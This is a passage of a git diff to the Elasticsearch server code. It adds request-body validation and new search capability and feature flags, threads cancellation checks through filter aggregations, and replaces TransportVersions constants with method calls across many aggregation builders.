ElasticsearchParseException("request body is required"); } else if (xContentType.get() == null) { throwValidationException("unknown content type"); } + } + + /** + * Returns reference to the network buffer of HTTP content or throw an exception if the body or content type is missing. + * See {@link #content()}. + */ + public ReleasableBytesReference requiredContent() { + ensureContent(); return content(); } diff --git a/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java b/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java index f638367b85e76..293c8128dc8d9 100644 --- a/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java +++ b/server/src/main/java/org/elasticsearch/rest/action/document/RestBulkAction.java @@ -137,6 +137,7 @@ public RestChannelConsumer prepareRequest(final RestRequest request, final NodeC client.bulk(bulkRequest, ActionListener.releaseAfter(new RestRefCountedChunkedToXContentListener<>(channel), content)); }; } else { + request.ensureContent(); String waitForActiveShards = request.param("wait_for_active_shards"); TimeValue timeout = request.paramAsTime("timeout", BulkShardRequest.DEFAULT_TIMEOUT); String refresh = request.param("refresh"); diff --git a/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java b/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java index ecbd092b455c7..5a8d462226008 100644 --- a/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java +++ b/server/src/main/java/org/elasticsearch/rest/action/search/SearchCapabilities.java @@ -33,6 +33,8 @@ private SearchCapabilities() {} private static final String TRANSFORM_RANK_RRF_TO_RETRIEVER = "transform_rank_rrf_to_retriever"; /** Support kql query. */ private static final String KQL_QUERY_SUPPORTED = "kql_query"; + private static final String KQL_QUERY_BOOLEAN_FIELD_QUERY_SUPPORTED = "kql_query_boolean_field_query"; + /** Support propagating nested retrievers' inner_hits to top-level compound retrievers . */ private static final String NESTED_RETRIEVER_INNER_HITS_SUPPORT = "nested_retriever_inner_hits_support"; /** Fixed the math in {@code moving_fn}'s {@code linearWeightedAvg}. */ @@ -52,6 +54,7 @@ private SearchCapabilities() {} private static final String SIGNIFICANT_TERMS_ON_NESTED_FIELDS = "significant_terms_on_nested_fields"; private static final String EXCLUDE_VECTORS_PARAM = "exclude_vectors_param"; private static final String DENSE_VECTOR_UPDATABLE_BBQ = "dense_vector_updatable_bbq"; + private static final String BUCKET_SCRIPT_PARENT_MULTI_BUCKET_ERROR = "bucket_script_parent_multi_bucket_error"; public static final Set CAPABILITIES; static { @@ -69,12 +72,14 @@ private SearchCapabilities() {} capabilities.add(MOVING_FN_RIGHT_MATH); capabilities.add(K_DEFAULT_TO_SIZE); capabilities.add(KQL_QUERY_SUPPORTED); + capabilities.add(KQL_QUERY_BOOLEAN_FIELD_QUERY_SUPPORTED); capabilities.add(HIGHLIGHT_MAX_ANALYZED_OFFSET_DEFAULT); capabilities.add(INDEX_SELECTOR_SYNTAX); capabilities.add(SIGNIFICANT_TERMS_BACKGROUND_FILTER_AS_SUB); capabilities.add(SIGNIFICANT_TERMS_ON_NESTED_FIELDS); capabilities.add(EXCLUDE_VECTORS_PARAM); capabilities.add(DENSE_VECTOR_UPDATABLE_BBQ); + capabilities.add(BUCKET_SCRIPT_PARENT_MULTI_BUCKET_ERROR); CAPABILITIES = Set.copyOf(capabilities); } } diff --git a/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java b/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java index 47d87191675f3..ef425b03b5f5a 100644 --- a/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java +++ b/server/src/main/java/org/elasticsearch/script/ScriptMetadata.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.Logger; import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; @@ -131,7 +130,7 @@ public void writeTo(StreamOutput out) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } @@ -283,7 +282,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java b/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java index 55ba94d97b03a..dd19aa73a2337 100644 --- a/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/SearchExtBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.io.stream.VersionedNamedWriteable; @@ -45,6 +44,6 @@ public abstract class SearchExtBuilder implements VersionedNamedWriteable, ToXCo @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/SearchFeatures.java b/server/src/main/java/org/elasticsearch/search/SearchFeatures.java index 0c2f7c2aa625b..80ccd4c188538 100644 --- a/server/src/main/java/org/elasticsearch/search/SearchFeatures.java +++ b/server/src/main/java/org/elasticsearch/search/SearchFeatures.java @@ -32,6 +32,7 @@ public Set getFeatures() { public static final NodeFeature INT_SORT_FOR_INT_SHORT_BYTE_FIELDS = new NodeFeature("search.sort.int_sort_for_int_short_byte_fields"); static final NodeFeature MULTI_MATCH_CHECKS_POSITIONS = new NodeFeature("search.multi.match.checks.positions"); public static final NodeFeature BBQ_HNSW_DEFAULT_INDEXING = new NodeFeature("search.vectors.mappers.default_bbq_hnsw"); + public static final NodeFeature SEARCH_WITH_NO_DIMENSIONS_BUGFIX = new NodeFeature("search.vectors.no_dimensions_bugfix"); @Override public Set getTestFeatures() { @@ -41,7 +42,8 @@ public Set getTestFeatures() { RESCORER_MISSING_FIELD_BAD_REQUEST, INT_SORT_FOR_INT_SHORT_BYTE_FIELDS, MULTI_MATCH_CHECKS_POSITIONS, - BBQ_HNSW_DEFAULT_INDEXING + BBQ_HNSW_DEFAULT_INDEXING, + SEARCH_WITH_NO_DIMENSIONS_BUGFIX ); } } diff --git a/server/src/main/java/org/elasticsearch/search/SearchService.java b/server/src/main/java/org/elasticsearch/search/SearchService.java index d485b53e7e409..e29cb4f87fc76 100644 --- a/server/src/main/java/org/elasticsearch/search/SearchService.java +++ b/server/src/main/java/org/elasticsearch/search/SearchService.java @@ -889,6 +889,17 @@ private SearchPhaseResult executeQueryPhase(ShardSearchRequest request, Cancella } if (request.numberOfShards() == 1 && (request.source() == null || request.source().rankBuilder() == null)) { // we already have query results, but we can run fetch at the same time + // in this case we reuse the search context across search and fetch phase, hence we need to clear the cancellation + // checks that were applied by the query phase before running fetch. Note that the timeout checks are not applied + // to the fetch phase, while the cancellation checks are. + context.searcher().clearQueryCancellations(); + if (context.lowLevelCancellation()) { + context.searcher().addQueryCancellation(() -> { + if (task != null) { + task.ensureNotCancelled(); + } + }); + } context.addFetchResult(); return executeFetchPhase(readerContext, context, afterQueryTime); } else { diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java index ba00e3696d381..4bf4874241048 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/composite/CompositeAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.composite; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.mapper.TimeSeriesIdFieldMapper.TimeSeriesIdFieldType; @@ -306,7 +305,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java index 9e20429a147f5..5bc7692969e00 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.filter; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -154,7 +153,7 @@ public QueryBuilder getFilter() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static class FilterAggregatorFactory extends AggregatorFactory { diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java index cc8ecc74b5ea0..dd6470146f744 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FilterByFilterAggregator.java @@ -23,6 +23,7 @@ import org.elasticsearch.search.aggregations.LeafBucketCollector; import org.elasticsearch.search.aggregations.support.AggregationContext; import org.elasticsearch.search.runtime.AbstractScriptFieldQuery; +import org.elasticsearch.tasks.TaskCancelledException; import java.io.IOException; import java.util.ArrayList; @@ -268,7 +269,7 @@ protected LeafBucketCollector getLeafCollector(AggregationExecutionContext aggCt private void collectCount(LeafReaderContext ctx, Bits live) throws IOException { Counter counter = new Counter(docCountProvider); for (int filterOrd = 0; filterOrd < filters().size(); filterOrd++) { - incrementBucketDocCount(filterOrd, filters().get(filterOrd).count(ctx, counter, live)); + incrementBucketDocCount(filterOrd, filters().get(filterOrd).count(ctx, counter, live, this::checkCancelled)); } } @@ -306,11 +307,17 @@ public void setScorer(Scorable scorer) {} MatchCollector collector = new MatchCollector(); // create the buckets so we can call collectExistingBucket grow(filters().size() + 1); - filters().get(0).collect(aggCtx.getLeafReaderContext(), collector, live); + filters().get(0).collect(aggCtx.getLeafReaderContext(), collector, live, this::checkCancelled); for (int filterOrd = 1; filterOrd < filters().size(); filterOrd++) { collector.subCollector = collectableSubAggregators.getLeafCollector(aggCtx); collector.filterOrd = filterOrd; - filters().get(filterOrd).collect(aggCtx.getLeafReaderContext(), collector, live); + filters().get(filterOrd).collect(aggCtx.getLeafReaderContext(), collector, live, this::checkCancelled); + } + } + + private void checkCancelled() { + if (context.isCancelled()) { + throw new TaskCancelledException("cancelled"); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java index 6b3e0743dfdb0..84e25c1e3dd10 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/FiltersAggregationBuilder.java @@ -394,6 +394,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java index e8e33655d47c1..9c6f7ddd6cc02 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/filter/QueryToFilterAdapter.java @@ -29,6 +29,7 @@ import org.apache.lucene.util.Bits; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.Aggregator; +import org.elasticsearch.search.internal.CancellableBulkScorer; import org.elasticsearch.xcontent.XContentBuilder; import java.io.IOException; @@ -192,7 +193,7 @@ Scorer randomAccessScorer(LeafReaderContext ctx) throws IOException { /** * Count the number of documents that match this filter in a leaf. */ - long count(LeafReaderContext ctx, FiltersAggregator.Counter counter, Bits live) throws IOException { + long count(LeafReaderContext ctx, FiltersAggregator.Counter counter, Bits live, Runnable checkCancelled) throws IOException { /* * weight().count will return the count of matches for ctx if it can do * so in constant time, otherwise -1. The Weight is responsible for @@ -216,20 +217,22 @@ long count(LeafReaderContext ctx, FiltersAggregator.Counter counter, Bits live) // No hits in this segment. return 0; } - scorer.score(counter, live, 0, DocIdSetIterator.NO_MORE_DOCS); + CancellableBulkScorer cancellableScorer = new CancellableBulkScorer(scorer, checkCancelled); + cancellableScorer.score(counter, live, 0, DocIdSetIterator.NO_MORE_DOCS); return counter.readAndReset(ctx); } /** * Collect all documents that match this filter in this leaf. */ - void collect(LeafReaderContext ctx, LeafCollector collector, Bits live) throws IOException { + void collect(LeafReaderContext ctx, LeafCollector collector, Bits live, Runnable checkCancelled) throws IOException { BulkScorer scorer = weight().bulkScorer(ctx); if (scorer == null) { // No hits in this segment. return; } - scorer.score(collector, live, 0, DocIdSetIterator.NO_MORE_DOCS); + CancellableBulkScorer cancellableScorer = new CancellableBulkScorer(scorer, checkCancelled); + cancellableScorer.score(collector, live, 0, DocIdSetIterator.NO_MORE_DOCS); } /** diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java index cbdae7cf3256b..76538aaeb997d 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoHashGridAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.geogrid; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeoBoundingBox; import org.elasticsearch.common.geo.GeoUtils; import org.elasticsearch.common.io.stream.StreamInput; @@ -113,6 +112,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java index 2219c1d9da4ab..d3dca2b689c4e 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/geogrid/GeoTileGridAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.geogrid; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeoBoundingBox; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -109,6 +108,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java index a28803f042381..bff032c7a75e8 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/global/GlobalAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.global; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AbstractAggregationBuilder; @@ -82,6 +81,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java index 4a6b6ca1c7b8b..5c8bf62ab2d34 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/DateHistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -535,7 +534,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java index 6d0e63831ccbd..e02a90f040d3e 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/HistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -405,7 +404,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java index 06aaf9d365e0a..893ca412f29f2 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/histogram/VariableWidthHistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.settings.Settings; @@ -235,6 +234,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java index 54a7af743c7ca..75a5e0496c0b6 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/missing/MissingAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.missing; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -117,6 +116,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java index 5e0e730387660..dd776c9411d4a 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/NestedAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.nested; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -151,6 +150,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java index a515b0ecdac13..3d10e03ce9c0c 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/nested/ReverseNestedAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.nested; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -172,6 +171,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java index ff4693c482469..16b2c5bf87c25 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/DateRangeAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.range; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.logging.DeprecationCategory; import org.elasticsearch.common.logging.DeprecationLogger; @@ -127,7 +126,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java index d20f768bedb43..157d71448a59a 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/GeoDistanceAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.range; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.geo.GeoDistance; import org.elasticsearch.common.geo.GeoPoint; @@ -489,7 +488,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java index ff684768b5c37..d1e74e5ef7a0f 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/IpRangeAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.document.InetAddressPoint; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -403,6 +402,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java index 28583cc961078..0e21f4c024e4b 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/range/RangeAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.range; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.search.DocValueFormat; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -201,6 +200,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java index 0ef3af8a9718b..c09e0f3b91ccb 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/DiversifiedAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.sampler; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -189,7 +188,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java index 871c9f3a2ff7f..f21d8988efcaa 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/sampler/SamplerAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.sampler; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -141,7 +140,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java index 25c1486e10ce0..f1e02d4bff8b8 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/RareTermsAggregationBuilder.java @@ -9,7 +9,6 @@ package org.elasticsearch.search.aggregations.bucket.terms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -240,6 +239,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java index cc74cba1e2d8a..58cfc5cbd113c 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTermsAggregationBuilder.java @@ -9,7 +9,6 @@ package org.elasticsearch.search.aggregations.bucket.terms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -370,6 +369,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java index 449a189e9aa39..1c4d2cf02117e 100644 --- a/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/aggregations/bucket/terms/SignificantTextAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations.bucket.terms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.AbstractQueryBuilder; @@ -377,6 +376,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git 